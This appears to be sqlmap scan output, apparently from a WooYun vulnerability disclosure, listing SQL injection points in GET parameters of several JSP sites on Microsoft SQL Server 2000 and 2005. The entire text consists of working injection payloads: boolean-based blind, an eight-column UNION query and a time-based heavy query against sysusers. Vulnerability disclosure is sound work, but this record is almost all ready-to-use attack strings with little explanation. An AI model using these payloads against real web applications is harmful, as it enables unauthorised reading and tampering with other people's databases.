WooYun.org

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1170 AND 5833=5833&fid=1196&nid=1196
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005

Place: GET
Parameter: LeadXx
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flag=3&LeadXx= AND 4692=4692&pageCurrent=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: flag=3&LeadXx=-1217 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(109)+CHAR(117)+CHAR(113)+CHAR(99)+CHAR(86)+CHAR(106)+CHAR(115)+CHAR(68)+CHAR(89)+CHAR(68)+CHAR(98)+CHAR(85)+CHAR(118)+CHAR(113)+CHAR(104)+CHAR(110)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &pageCurrent=1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: flag=3&LeadXx= AND 9335=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&pageCurrent=1
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5961 AND 7367=7367&nid=737
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 8554=8554
---
back-end DBMS: Microsoft SQL Server 2000